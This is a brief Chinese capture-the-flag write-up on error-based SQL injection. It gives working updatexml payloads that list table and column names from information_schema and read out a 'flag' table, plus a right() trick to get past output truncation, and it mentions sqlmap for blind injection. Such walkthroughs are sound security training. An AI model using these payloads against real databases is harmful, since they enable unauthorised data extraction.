SQL 报错注入
输入1,1’判断是报错注入。
用updatexml函数报错注入,报表名。1 union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)
报字段名1 union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’),0x7e),1)
读出字段内容1 union select updatexml(1,concat(0x7e,(select flag from flag),0x7e),1)
发现flag由于回显长度的限制,没有完全返回,使用right函数让后半部分的内容回显出来1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from flag) ,41),0x7e),1);
布尔盲注和时间盲注过于复杂,直接用sqlmap。